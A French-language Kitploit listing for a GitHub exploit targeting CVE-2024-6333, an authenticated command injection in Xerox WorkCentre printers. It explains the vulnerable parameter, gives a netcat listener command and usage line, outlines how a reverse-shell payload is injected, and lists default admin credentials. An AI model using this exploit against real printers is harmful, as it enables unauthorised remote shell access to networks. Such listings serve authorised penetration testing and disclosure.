Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-6333 — Vulnérabilité d'exécution de code à distance authentifiée dans les imprimantes Xerox WorkCentre via la fonctionnalité Network Troubleshooting Log. | Kitploit
Outils/GitHubGitHub/0xqrx/cve-2024-6333
Sécurité des Systèmes EmbarquésExploitationExploitation d'Applications WebTests d'IntrusionSécurité Matériel et IoT
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Vulnérabilité d'exécution de code à distance authentifiée dans les imprimantes Xerox WorkCentre via la fonctionnalité Network Troubleshooting Log.

Voir le dépôt
6il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-6333 - Exécution de code à distance authentifiée Xerox

Vulnérabilité d'exécution de code à distance authentifiée dans les imprimantes Xerox WorkCentre via la fonctionnalité Journal de dépannage réseau.

Description

La fonctionnalité Journal de dépannage réseau (/properties/security/network_troubleshooting_log.php) ne parvient pas à assainir le paramètre du serveur de destination (security.nwtroubleshoot.destination.server), ce qui permet à un administrateur authentifié d'injecter des commandes OS arbitraires. Lorsque la capture du journal réseau est démarrée, la charge utile injectée est exécutée comme une commande shell, entraînant une exécution de code à distance.

Produits concernés

  • XEROX WorkCentre 6655 (testé sur le firmware 073.110.019.14200)
  • Plusieurs autres modèles d'imprimantes Xerox (voir l'avis de sécurité)

Références

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

Prérequis

  • Python 3
  • Identifiants administrateur valides sur l'imprimante cible
  • Accès réseau à la cible

Installation

root@kitploit:~
pip install -r requirements.txt

Utilisation

Démarrez un écouteur sur votre machine :

root@kitploit:~
nc -lvnp 8443

Exécutez l'exploit :

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

Arguments

Fonctionnement

  1. S'authentifie à l'interface web de l'imprimante à l'aide des identifiants fournis
  2. Arrête toute session de journal de dépannage réseau existante
  3. Injecte une charge utile de reverse shell dans le champ du serveur de destination
  4. Déclenche la capture du journal réseau, exécutant la charge utile
  5. Attend 30 secondes, puis envoie une commande de nettoyage/arrêt

Avertissement

Cet outil est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal.

Télécharger l’outil
ArgumentRequisDéfautDescription
--targetOuiURL cible (p. ex., https://192.0.2.1)
--lhostOuiAdresse IP de l'écouteur
--lportNon8443Port de l'écouteur
--userNonadminNom d'utilisateur administrateur
--passwordNon1111Mot de passe administrateur
--proxyNonURL du proxy (p. ex., http://127.0.0.1:8080)